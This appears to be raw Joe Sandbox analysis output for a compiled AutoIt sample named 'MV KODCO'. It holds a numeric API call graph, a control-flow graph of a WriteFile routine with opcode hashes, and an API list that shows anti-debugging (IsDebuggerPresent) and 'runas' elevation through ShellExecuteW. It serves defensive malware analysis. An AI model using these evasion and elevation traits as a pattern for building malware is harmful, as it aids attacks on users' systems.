5e4252 84 API calls 93784->93788 93789 5e4252 84 API calls 93785->93789 93786->93760 93786->93761 93819 5ec993 Mailbox __NMSG_WRITE 93787->93819 93788->93773 93790 653157 93789->93790 93791 5ff4ea 48 API calls 93790->93791 93798 653194 93791->93798 93792 5eca9d 93871 5e4907 93792->93871 93796 5e3d98 93796->92928 93796->92950 93797 5ecaa9 SetCurrentDirectoryW 93797->93815 93800 5eba85 48 API calls 93798->93800 93827 6531dd Mailbox 93800->93827 93802 6533ce 93882 629b72 48 API calls 93802->93882 93803 653467 93886 6225b5 86 API calls 4 library calls 93803->93886 93806 653480 93806->93792 93808 6533f0 93883 6429e8 48 API calls ___crtGetEnvironmentStringsW 93808->93883 93810 6533fd 93811 601c9d _free 47 API calls 93810->93811 93811->93815 93813 65345f 93885 62240b 48 API calls 3 library calls 93813->93885 93851 5e48dd 93815->93851 93816 5ece19 48 API calls 93816->93819 93817 5eba85 48 API calls 93817->93827 93819->93792 93819->93803 93819->93813 93819->93816 93864 5eb337 56 API calls _wcscpy 93819->93864 93865 5fc258 GetStringTypeW 93819->93865 93866 5ecb93 59 API calls __wcsnicmp 93819->93866 93867 5ecb5a GetStringTypeW __NMSG_WRITE 93819->93867 93868 6016d0 GetStringTypeW __wtof_l 93819->93868 93869 5ecc24 162 API calls 3 library calls 93819->93869 93870 5fc682 48 API calls 93819->93870 93823 5ece19 48 API calls 93823->93827 93826 653420 93884 6225b5 86 API calls 4 library calls 93826->93884 93827->93802 93827->93817 93827->93823 93827->93826 93878 622551 48 API calls ___crtGetEnvironmentStringsW 93827->93878 93879 622472 60 API calls 2 library calls 93827->93879 93880 629c12 48 API calls 93827->93880 93881 5fc682 48 API calls 93827->93881 93829 653439 93830 601c9d _free 47 API calls 93829->93830 93831 65344c 93830->93831 93831->93815 93833 5ebb25 93832->93833 93837 5eba98 ___crtGetEnvironmentStringsW 93832->93837 93835 5ff4ea 48 API calls 93833->93835 93834 5ff4ea 48 API calls 93836 5eba9f 93834->93836 93835->93837 93838 5ebac8 93836->93838 93839 5ff4ea 48 API calls 93836->93839 93837->93834 93838->93736 93839->93838 93841 5e4dec 93840->93841 93844 5e4e9a 93840->93844 93843 5ff4ea 48 API calls 93841->93843 93845 5e4e1e 93841->93845 93842 5ff4ea 48 API calls 93842->93845 93843->93845 93844->93736 93845->93842 93845->93844 93846->93721 93847->93736 93848->93736 93849->93736 93850->93730 93852 5e4907 CloseHandle 93851->93852 93853 5e48e5 Mailbox 93852->93853 93854 5e4907 CloseHandle 93853->93854 93855 5e48fc 93854->93855 93855->93796 93856->93751 93857->93753 93858->93762 93859->93777 93860->93786 93887 601e46 93861->93887 93864->93819 93865->93819 93866->93819 93867->93819 93868->93819 93869->93819 93870->93819 93872 5e4920 93871->93872 93873 5e4911 93871->93873 93872->93873 93874 5e4925 CloseHandle 93872->93874 93873->93797 93874->93873 93875->93750 93876->93757 93877->93782 93878->93827 93879->93827 93880->93827 93881->93827 93882->93808 93883->93810 93884->93829 93885->93803 93886->93806 93888 601e61 93887->93888 93891 601e55 93887->93891 93911 607c0e 47 API calls __getptd_noexit 93888->93911 93890 602019 93896 601e41 93890->93896 93912 606e10 8 API calls __cftog_l 93890->93912 93891->93888 93898 601ed4 93891->93898 93906 609d6b 47 API calls __cftog_l 93891->93906 93894 601fa0 93894->93888 93894->93896 93899 601fb0 93894->93899 93895 601f5f 93895->93888 93897 601f7b 93895->93897 93908 609d6b 47 API calls __cftog_l 93895->93908 93896->93772 93897->93888 93897->93896 93902 601f91 93897->93902 93898->93888 93905 601f41 93898->93905 93907 609d6b 47 API calls __cftog_l 93898->93907 93910 609d6b 47 API calls __cftog_l 93899->93910 93909 609d6b 47 API calls __cftog_l 93902->93909 93905->93894 93905->93895 93906->93898 93907->93905 93908->93897 93909->93896 93910->93896 93911->93890 93912->93896 93914 5e4c8b 93913->93914 93915 5e4d94 93913->93915 93914->93915 93916 5ff4ea 48 API calls 93914->93916 93915->93060 93917 5e4cb2 93916->93917 93918 5ff4ea 48 API calls 93917->93918 93923 5e4d22 93918->93923 93921 5e4dd9 48 API calls 93921->93923 93922 5eba85 48 API calls 93922->93923 93923->93915 93923->93921 93923->93922 93926 5eb470 93923->93926 93954 629af1 48 API calls 93923->93954 93924->93062 93925->93064 93927 5e6b0f 48 API calls 93926->93927 93945 5eb495 93927->93945 93928 5eb69b 93929 5eba85 48 API calls 93928->93929 93930 5eb6b5 Mailbox 93929->93930 93930->93923 93933 65397b 93967 6226bc 88 API calls 4 library calls 93933->93967 93934 5eb9e4 93968 6226bc 88 API calls 4 library calls 93934->93968 93937 653973 93937->93930 93939 5eba85 48 API calls 93939->93945 93941 653989 93943 5eba85 48 API calls 93941->93943 93942 5ebcce 48 API calls 93942->93945 93943->93937 93944 653909 93946 5e6b4a 48 API calls 93944->93946 93945->93928 93945->93933 93945->93934 93945->93939 93945->93942 93945->93944 93947 5ebb85 48 API calls 93945->93947 93950 5ebdfa 48 API calls 93945->93950 93953 653939 ___crtGetEnvironmentStringsW 93945->93953 93955 5ec413 59 API calls 93945->93955 93956 5ebc74 48 API calls 93945->93956 93957 5ec6a5 49 API calls 93945->93957 93958 5ec799 93945->93958 93948 653914 93946->93948 93947->93945 93952 5ff4ea 48 API calls 93948->93952 93951 5eb66c CharUpperBuffW 93950->93951 93951->93945 93952->93953 93966 6226bc 88 API calls 4 library calls 93953->93966 93954->93923 93955->93945 93956->93945 93957->93945 93959 651f17 93958->93959 93960 5ec7b0 93958->93960 93961 5e6b4a 48 API calls 93959->93961 93962 5ec7bd ___crtGetEnvironmentStringsW 93960->93962 93965 5fee75 48 API calls 93960->93965 93963 651f21 93961->93963 93962->93945 93964 5ff4ea 48 API calls 93963->93964 93964->93962 93965->93962 93966->93937 93967->93941 93968->93937 93970 5e403c LoadImageW 93969->93970 93971 65418d EnumResourceNamesW 93969->93971 93972 5e3ee1 RegisterClassExW 93970->93972 93971->93972 93973 5e3f53 7 API calls 93972->93973 93973->93079 93975 5ef130 93974->93975 93976 5efe30 335 API calls 93975->93976 93980 5ef199 93975->93980 93978 658728 93976->93978 93977 5ef595 93984 5ed7f7 48 API calls 93977->93984 94020 5ef431 Mailbox 93977->94020 93978->93980 94073 62cc5c 86 API calls 4 library calls 93978->94073 93979 6587c8 94076 62cc5c 86 API calls 4 library calls 93979->94076 93980->93977 93986 5ed7f7 48 API calls 93980->93986 94018 5ef229 93980->94018 94026 5ef3dd 93980->94026 93981 5ef418 93994 658b1b 93981->93994 94014 5ef6aa 93981->94014 93981->94020 93985 6587a3 93984->93985 94075 600f0a 52 API calls __cinit 93985->94075 93989 658772 93986->93989 93988 5ef3f2 93988->93981 94077 629af1 48 API calls 93988->94077 94074 600f0a 52 API calls __cinit 93989->94074 93990 5ed6e9 55 API calls 93990->94020 93992 5ef770 93995 658a45 93992->93995 94015 5ef77a 93992->94015 94000 658b2c 93994->94000 94001 658bcf 93994->94001 94083 5fc1af 48 API calls 93995->94083 93996 658b7e 94086 63e40a 335 API calls Mailbox 93996->94086 93997 658c53 94091 62cc5c 86 API calls 4 library calls 93997->94091 93998 658810 94078 63eef8 335 API calls 93998->94078 93999 5efe30 335 API calls 93999->94014 94085 63f5ee 335 API calls 94000->94085 94088 62cc5c 86 API calls 4 library calls 94001->94088 94002 658beb 94089 63bdbd 335 API calls Mailbox 94002->94089 94004 5efe30 335 API calls 94004->94020 94010 5f1b90 48 API calls 94010->94020 94011 5f1b90 48 API calls 94011->94020 94014->93992 94014->93999 94017 5efce0 94014->94017 94014->94020 94038 5ef537 Mailbox 94014->94038 94015->94010 94016 658c00 94016->94038 94090 62cc5c 86 API calls 4 library calls 94016->94090 94017->94038 94087 62cc5c 86 API calls 4 library calls 94017->94087 94018->93977 94018->93981 94018->94020 94018->94026 94020->93990 94020->93996 94020->93997 94020->94002 94020->94004 94020->94011 94020->94017 94024 62cc5c 86 API calls 94020->94024 94020->94038 94072 5edd47 48 API calls ___crtGetEnvironmentStringsW 94020->94072 94084 6197ed InterlockedDecrement 94020->94084 94092 5fc1af 48 API calls 94020->94092 94021 658823 94021->93981 94025 65884b 94021->94025 94024->94020 94079 63ccdc 48 API calls 94025->94079 94026->93979 94026->93988 94026->94020 94028 658857 94030 658865 94028->94030 94031 6588aa 94028->94031 94080 629b72 48 API calls 94030->94080 94034 6588a0 Mailbox 94031->94034 94081 62a69d 48 API calls 94031->94081 94032 5efe30 335 API calls 94032->94038 94034->94032 94036 6588e7 94082 5ebc74 48 API calls 94036->94082 94038->93101 94040 5f479f 94039->94040 94041 5f4637 94039->94041 94044 5ece19 48 API calls 94040->94044 94042 656e05 94041->94042 94043 5f4643 94041->94043 94147 63e822 335 API calls Mailbox 94042->94147 94146 5f4300 335 API calls ___crtGetEnvironmentStringsW 94043->94146 94051 5f46e4 Mailbox 94044->94051 94047 656e11 94048 5f4739 Mailbox 94047->94048 94148 62cc5c 86 API calls 4 library calls 94047->94148 94048->93101 94050 5f4659 94050->94047 94050->94048 94050->94051 94054 5e4252 84 API calls 94051->94054 94093 626524 94051->94093 94096 62fa0c 94051->94096 94137 636ff0 94051->94137 94054->94048 94056->93101 94057->93101 94058->93101 94059->93101 94060->93101 94061->93093 94062->93087 94063->93092 94064->93101 94065->93101 94066->93106 94067->93106 94068->93106 94069->93106 94070->93106 94071->93106 94072->94020 94073->93980 94074->94018 94075->94020 94076->94038 94077->93998 94078->94021 94079->94028 94080->94034 94081->94036 94082->94034 94083->94020 94084->94020 94085->94020 94086->94017 94087->94038 94088->94038 94089->94016 94090->94038 94091->94038 94092->94020 94149 626ca9 GetFileAttributesW 94093->94149 94097 62fa1c __ftell_nolock 94096->94097 94098 62fa44 94097->94098 94214 5ed286 48 API calls 94097->94214 94100 5e936c 81 API calls 94098->94100 94101 62fa5e 94100->94101 94102 62fa80 94101->94102 94103 62fb68 94101->94103 94112 62fb92 94101->94112 94104 5e936c 81 API calls 94102->94104 94105 5e41a9 136 API calls 94103->94105 94110 62fa8c _wcscpy _wcschr 94104->94110 94106 62fb79 94105->94106 94107 62fb8e 94106->94107 94108 5e41a9 136 API calls 94106->94108 94109 5e936c 81 API calls 94107->94109 94107->94112 94108->94107 94111 62fbc7 94109->94111 94116 62fab0 _wcscat _wcscpy 94110->94116 94120 62fade _wcscat 94110->94120 94113 601dfc __wsplitpath 47 API calls 94111->94113 94112->94048 94121 62fbeb _wcscat _wcscpy 94113->94121 94114 5e936c 81 API calls 94115 62fafc _wcscpy 94114->94115 94215 6272cb GetFileAttributesW 94115->94215 94118 5e936c 81 API calls 94116->94118 94118->94120 94119 62fb1c __NMSG_WRITE 94119->94112 94122 5e936c 81 API calls 94119->94122 94120->94114 94125 5e936c 81 API calls 94121->94125 94123 62fb48 94122->94123 94216 6260dd 77 API calls 4 library calls 94123->94216 94126 62fc82 94125->94126 94153 62690b 94126->94153 94127 62fb5c 94127->94112 94129 62fca2 94130 626524 3 API calls 94129->94130 94131 62fcb1 94130->94131 94132 5e936c 81 API calls 94131->94132 94135 62fce2 94131->94135 94133 62fccb 94132->94133 94159 62bfa4 94133->94159 94136 5e4252 84 API calls 94135->94136 94136->94112 94138 5e936c 81 API calls 94137->94138 94139 63702a 94138->94139 94140 5eb470 91 API calls 94139->94140 94141 63703a 94140->94141 94142 63705f 94141->94142 94143 5efe30 335 API calls 94141->94143 94145 637063 94142->94145 94252 5ecdb9 48 API calls 94142->94252 94143->94142 94145->94048 94146->94050 94147->94047 94148->94048 94150 626529 94149->94150 94151 626cc4 FindFirstFileW 94149->94151 94150->94048 94151->94150 94152 626cd9 FindClose 94151->94152 94152->94150 94154 626918 _wcschr __ftell_nolock 94153->94154 94155 62692e _wcscat _wcscpy 94154->94155 94156 601dfc __wsplitpath 47 API calls 94154->94156 94155->94129 94157 62695d 94156->94157 94158 601dfc __wsplitpath 47 API calls 94157->94158 94158->94155 94160 62bfb1 __ftell_nolock 94159->94160 94161 5ff4ea 48 API calls 94160->94161 94162 62c00e 94161->94162 94163 5e47b7 48 API calls 94162->94163 94164 62c018 94163->94164 94165 62bdb4 GetSystemTimeAsFileTime 94164->94165 94166 62c023 94165->94166 94167 5e4517 83 API calls 94166->94167 94168 62c036 _wcscmp 94167->94168 94169 62c107 94168->94169 94170 62c05a 94168->94170 94171 62c56d 94 API calls 94169->94171 94172 62c56d 94 API calls 94170->94172 94187 62c0d3 _wcscat 94171->94187 94173 62c05f 94172->94173 94174 601dfc __wsplitpath 47 API calls 94173->94174 94177 62c110 94173->94177 94179 62c088 _wcscat _wcscpy 94174->94179 94175 5e44ed 64 API calls 94176 62c12c 94175->94176 94178 5e44ed 64 API calls 94176->94178 94177->94135 94180 62c13c 94178->94180 94182 601dfc __wsplitpath 47 API calls 94179->94182 94181 5e44ed 64 API calls 94180->94181 94183 62c157 94181->94183 94182->94187 94184 5e44ed 64 API calls 94183->94184 94185 62c167 94184->94185 94186 5e44ed 64 API calls 94185->94186 94188 62c182 94186->94188 94187->94175 94187->94177 94189 5e44ed 64 API calls 94188->94189 94190 62c192 94189->94190 94191 5e44ed 64 API calls 94190->94191 94192 62c1a2 94191->94192 94193 5e44ed 64 API calls 94192->94193 94194 62c1b2 94193->94194 94217 62c71a GetTempPathW GetTempFileNameW 94194->94217 94196 62c1be 94197 603499 117 API calls 94196->94197 94199 62c1cf 94197->94199 94198 6035e4 __fcloseall 83 API calls 94200 62c294 94198->94200 94199->94177 94201 5e44ed 64 API calls 94199->94201 94212 62c289 94199->94212 94218 602aae 94199->94218 94202 62c29a DeleteFileW 94200->94202 94203 62c2ae 94200->94203 94201->94199 94202->94177 94204 62c342 CopyFileW 94203->94204 94208 62c2b8 94203->94208 94205 62c36a DeleteFileW 94204->94205 94206 62c358 DeleteFileW 94204->94206 94231 62c6d9 CreateFileW 94205->94231 94206->94177 94210 62b965 118 API calls 94208->94210 94211 62c32d 94210->94211 94211->94205 94213 62c331 DeleteFileW 94211->94213 94212->94198 94213->94177 94214->94098 94215->94119 94216->94127 94217->94196 94219 602aba _flsall 94218->94219 94220 602ad4 94219->94220 94221 602aec 94219->94221 94222 602ae4 _flsall 94219->94222 94246 607c0e 47 API calls __getptd_noexit 94220->94246 94223 604e1c __lock_file 48 API calls 94221->94223 94222->94199 94225 602af2 94223->94225 94234 602957 94225->94234 94226 602ad9 94247 606e10 8 API calls __cftog_l 94226->94247 94232 62c715 94231->94232 94233 62c6ff SetFileTime CloseHandle 94231->94233 94232->94177 94233->94232 94236 602966 94234->94236 94241 602984 94234->94241 94235 602974 94249 607c0e 47 API calls __getptd_noexit 94235->94249 94236->94235 94236->94241 94242 60299c ___crtGetEnvironmentStringsW 94236->94242 94238 602979 94250 606e10 8 API calls __cftog_l 94238->94250 94248 602b24 LeaveCriticalSection LeaveCriticalSection _fseek 94241->94248 94242->94241 94243 602c84 __flush 78 API calls 94242->94243 94244 602933 __fclose_nolock 47 API calls 94242->94244 94245 60af61 __flswbuf 78 API calls 94242->94245 94251 608e63 78 API calls 5 library calls 94242->94251 94243->94242 94244->94242 94245->94242 94246->94226 94247->94222 94248->94222 94249->94238 94250->94241 94251->94242 94252->94145 94253 65197b 94258 5fdd94 94253->94258 94257 65198a 94259 5ff4ea 48 API calls 94258->94259 94260 5fdd9c 94259->94260 94261 5fddb0 94260->94261 94266 5fdf3d 94260->94266 94265 600f0a 52 API calls __cinit 94261->94265 94265->94257 94267 5fdf46 94266->94267 94269 5fdda8 94266->94269 94298 600f0a 52 API calls __cinit 94267->94298 94270 5fddc0 94269->94270 94271 5ed7f7 48 API calls 94270->94271 94272 5fddd7 GetVersionExW 94271->94272 94273 5e6a63 48 API calls 94272->94273 94274 5fde1a 94273->94274 94299 5fdfb4 94274->94299 94277 5e6571 48 API calls 94280 5fde2e 94277->94280 94279 6524c8 94280->94279 94303 5fdf77 94280->94303 94282 5fdebb 94284 5fdee3 94282->94284 94285 5fdf31 GetSystemInfo 94282->94285 94283 5fdea4 GetCurrentProcess 94312 5fdf5f LoadLibraryA GetProcAddress 94283->94312 94306 5fe00c 94284->94306 94288 5fdf0e 94285->94288 94290 5fdf1c FreeLibrary 94288->94290 94291 5fdf21 94288->94291 94290->94291 94291->94261 94292 5fdf29 GetSystemInfo 94295 5fdf03 94292->94295 94293 5fdef9 94309 5fdff4 94293->94309 94295->94288 94297 5fdf09 FreeLibrary 94295->94297 94297->94288 94298->94269 94300 5fdfbd 94299->94300 94301 5eb18b 48 API calls 94300->94301 94302 5fde22 94301->94302 94302->94277 94313 5fdf89 94303->94313 94317 5fe01e 94306->94317 94310 5fe00c 2 API calls 94309->94310 94311 5fdf01 GetNativeSystemInfo 94310->94311 94311->94295 94312->94282 94314 5fdea0 94313->94314 94315 5fdf92 LoadLibraryA 94313->94315 94314->94282 94314->94283 94315->94314 94316 5fdfa3 GetProcAddress 94315->94316 94316->94314 94318 5fdef1 94317->94318 94319 5fe027 LoadLibraryA 94317->94319 94318->94292 94318->94293 94319->94318 94320 5fe038 GetProcAddress 94319->94320 94320->94318 94321 6519cb 94326 5e2322 94321->94326 94323 6519d1 94359 600f0a 52 API calls __cinit 94323->94359 94325 6519db 94327 5e2344 94326->94327 94360 5e26df 94327->94360 94332 5ed7f7 48 API calls 94333 5e2384 94332->94333 94334 5ed7f7 48 API calls 94333->94334 94335 5e238e 94334->94335 94336 5ed7f7 48 API calls 94335->94336 94337 5e2398 94336->94337 94338 5ed7f7 48 API calls 94337->94338 94339 5e23de 94338->94339 94340 5ed7f7 48 API calls 94339->94340 94341 5e24c1 94340->94341 94368 5e263f 94341->94368 94345 5e24f1 94346 5ed7f7 48 API calls 94345->94346 94347 5e24fb 94346->94347 94397 5e2745 94347->94397 94349 5e2546 94350 5e2556 GetStdHandle 94349->94350 94351 65501d 94350->94351 94352 5e25b1 94350->94352 94351->94352 94354 655026 94351->94354 94353 5e25b7 CoInitialize 94352->94353 94353->94323 94404 6292d4 53 API calls 94354->94404 94356 65502d 94405 6299f9 CreateThread 94356->94405 94358 655039 CloseHandle 94358->94353 94359->94325 94406 5e2854 94360->94406 94363 5e6a63 48 API calls 94364 5e234a 94363->94364 94365 5e272e 94364->94365 94420 5e27ec 6 API calls 94365->94420 94367 5e237a 94367->94332 94369 5ed7f7 48 API calls 94368->94369 94370 5e264f 94369->94370 94371 5ed7f7 48 API calls 94370->94371 94372 5e2657 94371->94372 94421 5e26a7 94372->94421 94375 5e26a7 48 API calls 94376 5e2667 94375->94376 94377 5ed7f7 48 API calls 94376->94377 94378 5e2672 94377->94378 94379 5ff4ea 48 API calls 94378->94379 94380 5e24cb 94379->94380 94381 5e22a4 94380->94381 94382 5e22b2 94381->94382 94383 5ed7f7 48 API calls 94382->94383 94384 5e22bd 94383->94384 94385 5ed7f7 48 API calls 94384->94385 94386 5e22c8 94385->94386 94387 5ed7f7 48 API calls 94386->94387 94388 5e22d3 94387->94388 94389 5ed7f7 48 API calls 94388->94389 94390 5e22de 94389->94390 94391 5e26a7 48 API calls 94390->94391 94392 5e22e9 94391->94392 94393 5ff4ea 48 API calls 94392->94393 94394 5e22f0 94393->94394 94395 651fe7 94394->94395 94396 5e22f9 RegisterWindowMessageW 94394->94396 94396->94345 94398 655f4d 94397->94398 94399 5e2755 94397->94399 94426 62c942 50 API calls 94398->94426 94401 5ff4ea 48 API calls 94399->94401 94403 5e275d 94401->94403 94402 655f58 94403->94349 94404->94356 94405->94358 94427 6299df 54 API calls 94405->94427 94413 5e2870 94406->94413 94409 5e2870 48 API calls 94410 5e2864 94409->94410 94411 5ed7f7 48 API calls 94410->94411 94412 5e2716 94411->94412 94412->94363 94414 5ed7f7 48 API calls 94413->94414 94415 5e287b 94414->94415 94416 5ed7f7 48 API calls 94415->94416 94417 5e2883 94416->94417 94418 5ed7f7 48 API calls 94417->94418 94419 5e285c 94418->94419 94419->94409 94420->94367 94422 5ed7f7 48 API calls 94421->94422 94423 5e26b0 94422->94423 94424 5ed7f7 48 API calls 94423->94424 94425 5e265f 94424->94425 94425->94375 94426->94402 94428 6519ba 94433 5fc75a 94428->94433 94432 6519c9 94434 5ed7f7 48 API calls 94433->94434 94435 5fc7c8 94434->94435 94441 5fd26c 94435->94441 94437 5fc865 94438 5fc881 94437->94438 94444 5fd1fa 48 API calls ___crtGetEnvironmentStringsW 94437->94444 94440 600f0a 52 API calls __cinit 94438->94440 94440->94432 94445 5fd298 94441->94445 94444->94437 94446 5fd28b 94445->94446 94447 5fd2a5 94445->94447 94446->94437 94447->94446 94448 5fd2ac RegOpenKeyExW 94447->94448 94448->94446 94449 5fd2c6 RegQueryValueExW 94448->94449 94450 5fd2fc RegCloseKey 94449->94450 94451 5fd2e7 94449->94451 94450->94446 94451->94450 94452 5eb7b1 94461 5ec62c 94452->94461 94454 5eb7ec 94456 5eba85 48 API calls 94454->94456 94455 5eb7c2 94455->94454 94469 5ebc74 48 API calls 94455->94469 94460 5eb6b7 Mailbox 94456->94460 94458 5eb7e0 94459 5eba85 48 API calls 94458->94459 94459->94454 94462 5ebcce 48 API calls 94461->94462 94466 5ec63b 94462->94466 94463 6539fd 94470 6226bc 88 API calls 4 library calls 94463->94470 94465 5ec68b 94465->94455 94466->94463 94466->94465 94468 5ec799 48 API calls 94466->94468 94467 653a0b 94468->94466 94469->94458 94470->94467

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 644 60b043-60b080 call 60f8a0 647 60b082-60b084 644->647 648 60b089-60b08b 644->648 649 60b860-60b86c call 60a70c 647->649 650 60b0ac-60b0d9 648->650 651 60b08d-60b0a7 call 607bda call 607c0e call 606e10 648->651 652 60b0e0-60b0e7 650->652 653 60b0db-60b0de 650->653 651->649 657 60b105 652->657 658 60b0e9-60b100 call 607bda call 607c0e call 606e10 652->658 653->652 656 60b10b-60b110 653->656 662 60b112-60b11c call 60f82f 656->662 663 60b11f-60b12d call 613bf2 656->663 657->656 693 60b851-60b854 658->693 662->663 674 60b133-60b145 663->674 675 60b44b-60b45d 663->675 674->675 677 60b14b-60b183 call 607a0d GetConsoleMode 674->677 678 60b463-60b473 675->678 679 60b7b8-60b7d5 WriteFile 675->679 677->675 698 60b189-60b18f 677->698 684 60b479-60b484 678->684 685 60b55a-60b55f 678->685 681 60b7e1-60b7e7 GetLastError 679->681 682 60b7d7-60b7df 679->682 687 60b7e9 681->687 682->687 691 60b48a-60b49a 684->691 692 60b81b-60b833 684->692 688 60b663-60b66e 685->688 689 60b565-60b56e 685->689 695 60b7ef-60b7f1 687->695 688->692 694 60b674 688->694 689->692 696 60b574 689->696 699 60b4a0-60b4a3 691->699 700 60b835-60b838 692->700 701 60b83e-60b84e call 607c0e call 607bda 692->701 697 60b85e-60b85f 693->697 703 60b67e-60b693 694->703 705 60b7f3-60b7f5 695->705 706 60b856-60b85c 695->706 707 60b57e-60b595 696->707 697->649 708 60b191-60b193 698->708 709 60b199-60b1bc GetConsoleCP 698->709 710 60b4a5-60b4be 699->710 711 60b4e9-60b520 WriteFile 699->711 700->701 702 60b83a-60b83c 700->702 701->693 702->697 713 60b699-60b69b 703->713 705->692 715 60b7f7-60b7fc 705->715 706->697 716 60b59b-60b59e 707->716 708->675 708->709 717 60b440-60b446 709->717 718 60b1c2-60b1ca 709->718 719 60b4c0-60b4ca 710->719 720 60b4cb-60b4e7 710->720 711->681 712 60b526-60b538 711->712 712->695 721 60b53e-60b54f 712->721 722 60b6d8-60b719 WideCharToMultiByte 713->722 723 60b69d-60b6b3 713->723 725 60b812-60b819 call 607bed 715->725 726 60b7fe-60b810 call 607c0e call 607bda 715->726 727 60b5a0-60b5b6 716->727 728 60b5de-60b627 WriteFile 716->728 717->705 729 60b1d4-60b1d6 718->729 719->720 720->699 720->711 721->691 730 60b555 721->730 722->681 734 60b71f-60b721 722->734 731 60b6b5-60b6c4 723->731 732 60b6c7-60b6d6 723->732 725->693 726->693 736 60b5b8-60b5ca 727->736 737 60b5cd-60b5dc 727->737 728->681 739 60b62d-60b645 728->739 740 60b36b-60b36e 729->740 741 60b1dc-60b1fe 729->741 730->695 731->732 732->713 732->722 744 60b727-60b75a WriteFile 734->744 736->737 737->716 737->728 739->695 747 60b64b-60b658 739->747 742 60b370-60b373 740->742 743 60b375-60b3a2 740->743 748 60b200-60b215 741->748 749 60b217-60b223 call 601688 741->749 742->743 752 60b3a8-60b3ab 742->752 743->752 753 60b77a-60b78e GetLastError 744->753 754 60b75c-60b776 744->754 747->707 756 60b65e 747->756 750 60b271-60b283 call 6140f7 748->750 764 60b225-60b239 749->764 765 60b269-60b26b 749->765 774 60b435-60b43b 750->774 775 60b289 750->775 758 60b3b2-60b3c5 call 615884 752->758 759 60b3ad-60b3b0 752->759 763 60b794-60b796 753->763 754->744 761 60b778 754->761 756->695 758->681 778 60b3cb-60b3d5 758->778 759->758 766 60b407-60b40a 759->766 761->763 763->687 769 60b798-60b7b0 763->769 771 60b412-60b42d 764->771 772 60b23f-60b254 call 6140f7 764->772 765->750 766->729 770 60b410 766->770 769->703 776 60b7b6 769->776 770->774 771->774 772->774 784 60b25a-60b267 772->784 774->687 779 60b28f-60b2c4 WideCharToMultiByte 775->779 776->695 781 60b3d7-60b3ee call 615884 778->781 782 60b3fb-60b401 778->782 779->774 783 60b2ca-60b2f0 WriteFile 779->783 781->681 789 60b3f4-60b3f5 781->789 782->766 783->681 786 60b2f6-60b30e 783->786 784->779 786->774 787 60b314-60b31b 786->787 787->782 790 60b321-60b34c WriteFile 787->790 789->782 790->681 791 60b352-60b359 790->791 791->774 792 60b35f-60b366 791->792 792->782
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e52cd3a3deb229c20457727693acd9f76d18bb9656c784ef50a4ffcf6e4e40ae
                                                          • Instruction ID: 4401254697c1bd964676c2f3cd502e9d587f4d356e914e0034a40e47e6d40e83
                                                          • Opcode Fuzzy Hash: e52cd3a3deb229c20457727693acd9f76d18bb9656c784ef50a4ffcf6e4e40ae
                                                          • Instruction Fuzzy Hash: 45326F75B422288FDB288F14DC416EAB7F6FF46310F1890D9E40AA7A95D7709E81CF52

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,005E3AA3,?), ref: 005E3D45
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,005E3AA3,?), ref: 005E3D57
                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,006A1148,006A1130,?,?,?,?,005E3AA3,?), ref: 005E3DC8
                                                            • Part of subcall function 005E6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005E3DEE,006A1148,?,?,?,?,?,005E3AA3,?), ref: 005E6471
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,005E3AA3,?), ref: 005E3E48
                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,006928F4,00000010), ref: 00651CCE
                                                          • SetCurrentDirectoryW.KERNEL32(?,006A1148,?,?,?,?,?,005E3AA3,?), ref: 00651D06
                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0067DAB4,006A1148,?,?,?,?,?,005E3AA3,?), ref: 00651D89
                                                          • ShellExecuteW.SHELL32(00000000,?,?,?,?,005E3AA3), ref: 00651D90
                                                            • Part of subcall function 005E3E6E: GetSysColorBrush.USER32(0000000F), ref: 005E3E79
                                                            • Part of subcall function 005E3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 005E3E88
                                                            • Part of subcall function 005E3E6E: LoadIconW.USER32(00000063), ref: 005E3E9E
                                                            • Part of subcall function 005E3E6E: LoadIconW.USER32(000000A4), ref: 005E3EB0
                                                            • Part of subcall function 005E3E6E: LoadIconW.USER32(000000A2), ref: 005E3EC2
                                                            • Part of subcall function 005E3E6E: RegisterClassExW.USER32(?), ref: 005E3F30
                                                            • Part of subcall function 005E36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005E36E6
                                                            • Part of subcall function 005E36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005E3707
                                                            • Part of subcall function 005E36B8: ShowWindow.USER32(00000000,?,?,?,?,005E3AA3,?), ref: 005E371B
                                                            • Part of subcall function 005E36B8: ShowWindow.USER32(00000000,?,?,?,?,005E3AA3,?), ref: 005E3724
                                                            • Part of subcall function 005E4FFC: _memset.LIBCMT ref: 005E5022
                                                            • Part of subcall function 005E4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 005E50CB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
